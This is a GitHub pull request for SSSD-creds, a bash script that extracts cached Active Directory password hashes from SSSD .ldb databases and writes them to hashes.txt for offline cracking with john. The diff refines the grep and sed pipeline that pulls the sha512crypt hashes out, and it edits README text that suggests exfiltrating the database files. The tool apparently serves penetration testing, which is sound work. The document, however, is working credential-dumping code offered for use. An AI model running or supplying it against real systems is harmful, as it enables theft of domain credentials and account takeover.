### PR TITLE
Refactor hash identification

### DIFF
--- a/README.md
+++ b/README.md
@@ -6,12 +6,12 @@ Using this bash script it is possible to extract cached active directory credent
 bash analyze.sh [$path]
 ```
 
-Without a path argument, the default SSSD path "/var/lib/sss/db/" is used. If tdbdump is not installed, you can install it ("apt install tdb-tools") or exfiltrate these files:
+Without a path argument, the default SSSD path ``/var/lib/sss/db/`` is used. If tdbdump is not installed, you can install it with ``apt install tdb-tools`` or exfiltrate the files to a system where tdbdump is installed.
 
 ![image1](https://raw.githubusercontent.com/ricardojoserf/ricardojoserf.github.io/master/images/SSSD-creds/image1.png)
 
 
-In a system with tdbdump installed the script extracts the cached accounts and hashes, dumping the results to the file "hashes.txt"
+On a system with tdbdump installed, the script extracts the cached accounts and hashes, dumping the results to the file ``hashes.txt``.
 
 ![image2](https://raw.githubusercontent.com/ricardojoserf/ricardojoserf.github.io/master/images/SSSD-creds/image2.png)
 
@@ -26,4 +26,4 @@ john hashes.txt --format=sha512crypt
 
 ### Sources
 
-I created this script after reading this presentation by Tim (Wadhwa-)Brown: [Where 2 worlds collide - Bringing Mimikatz et al to UNIX](https://i.blackhat.com/eu-18/Wed-Dec-5/eu-18-Wadhwa-Brown-Where-2-Worlds-Collide-Bringing-Mimikatz-et-al-to-UNIX.pdf)
+I created this script after reading this presentation by Tim (Wadhwa-) Brown: [Where 2 worlds collide - Bringing Mimikatz et al to UNIX](https://i.blackhat.com/eu-18/Wed-Dec-5/eu-18-Wadhwa-Brown-Where-2-Worlds-Collide-Bringing-Mimikatz-et-al-to-UNIX.pdf)

--- a/README.md
+++ b/README.md
@@ -1,12 +1,12 @@
 # SSSD-creds
 
-Using this bash script it is possible to extract Active Directory accounts hashes when credential caching is enabled in SSSD.
+Using this bash script it is possible to extract cached active directory credentials when credential caching is enabled in SSSD.
 
 ```
 bash analyze.sh [$path]
 ```
 
-Without input arguments it takes the SSSD default path "/var/lib/sss/db/" but you can use a different one. If tdbdump is not installed it just lists the ldb files which contain the hashes, you can install it ("apt install tdb-tools") or exfiltrate these files:
+Without a path argument, the default SSSD path "/var/lib/sss/db/" is used. If tdbdump is not installed, you can install it ("apt install tdb-tools") or exfiltrate these files:
 
 ![image1](https://raw.githubusercontent.com/ricardojoserf/ricardojoserf.github.io/master/images/SSSD-creds/image1.png)
 
@@ -26,4 +26,4 @@ john hashes.txt --format=sha512crypt
 
 ### Sources
 
-I created the script after reading this presentation by Tim (Wadhwa-)Brown: [Where 2 worlds collide - Bringing Mimikatz et al to UNIX](https://i.blackhat.com/eu-18/Wed-Dec-5/eu-18-Wadhwa-Brown-Where-2-Worlds-Collide-Bringing-Mimikatz-et-al-to-UNIX.pdf)
+I created this script after reading this presentation by Tim (Wadhwa-)Brown: [Where 2 worlds collide - Bringing Mimikatz et al to UNIX](https://i.blackhat.com/eu-18/Wed-Dec-5/eu-18-Wadhwa-Brown-Where-2-Worlds-Collide-Bringing-Mimikatz-et-al-to-UNIX.pdf)

--- a/analyze.sh
+++ b/analyze.sh
@@ -14,7 +14,7 @@ else
 	echo ""
 fi
 
-for db_ in $(ls $location_/cache_*ldb)
+for db_ in $(ls $location_/*ldb)
 do
 	echo "Database file:" $(echo $db_)
 	if [ "$analyze" -eq "1" ]; then
@@ -22,7 +22,7 @@ do
 		for account_ in $(tdbdump $db_ | grep cachedPassword | cut -d "=" -f 3 | cut -d "," -f 1 | sort -u)
 		do 
 			echo "Account: " $account_
-			hash_="\$6\$"$(tdbdump $db_ | grep cachedPassword | grep $account_ | tr "=" "\n" | grep cachedPassword | sed "s/\\\00g//g" | sed 's/\\00//g' | sed 's/\\01//g' | awk -F 'cachedPassword' '{print $3}' | awk -F 'lastCachedPasswordChange' '{print $1 }')
+			hash_=$(tdbdump $db_ | grep cachedPassword | grep $account_ | grep -o "\$6\$.*cachedPassword" | sed "s/cachedPassword//g" | sed "s/\\\00//g")
 			echo "Hash:    " $hash_
 			echo "Adding hash to hashes.txt"
 			echo $account_:$hash_ >> hashes.txt


### PR DESCRIPTION
## Description

In some cases, hashes weren't properly identified in .ldb files. I have attempted to simply and improve the hash identification. 

## Proposed Changes

  - Use grep and regex to match all characters between "$6$" and "cachedPassword"
  - Pipe to sed to remove "\00" and "cachedPassword"

## Before

![Untitled](https://user-images.githubusercontent.com/16895391/227702457-a9b44a0d-625a-4dae-bfd9-0958e061f6c0.png)

## After

![Untitled2](https://user-images.githubusercontent.com/16895391/227702466-fb6f4945-51fb-438c-9288-77a0acbb7179.png)

